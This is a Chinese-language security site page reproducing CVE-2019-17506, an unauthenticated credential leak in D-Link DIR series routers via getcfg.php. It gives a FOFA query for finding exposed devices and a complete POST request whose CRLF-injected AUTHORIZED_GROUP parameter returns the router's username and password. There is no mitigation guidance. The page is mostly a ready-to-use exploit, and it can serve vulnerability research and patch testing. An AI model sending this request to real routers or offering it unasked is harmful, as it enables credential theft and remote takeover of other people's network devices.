黑客街 黑客街

D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506

目录

漏洞描述 #

D-Link DIR-868L B1-2.03和DIR-817LW A1-1.04路由器上有一些不需要身份验证的Web界面。攻击者可以通过SERVICES的DEVICE.ACCOUNT值以及AUTHORIZED_GROUP = 1%0a来获取getcfg.php的路由器的用户名和密码(以及其他信息)。这可用于远程控制路由器

漏洞影响 #

D-Link Dir 系列多个版本

FOFA #

app="D_Link-DIR-868L"

漏洞复现 #

登录页面如下

D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506

发送下请求包

POST /getcfg.php HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Length: 61

SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506

 

What are your Feelings
黑客街导航站是一款努力把互联网安全站点集接到一起,希望为每个小伙伴提供良好的"安全"体验。

街头小贩 匿名追踪 杀软对比

黑客街公众号黑客街

黑客街公众号

我要合作黑客街

我要合作

关于我们 免责说明 商务合作

Copyright © 2022 黑客街   豫ICP备19005024号    站点地图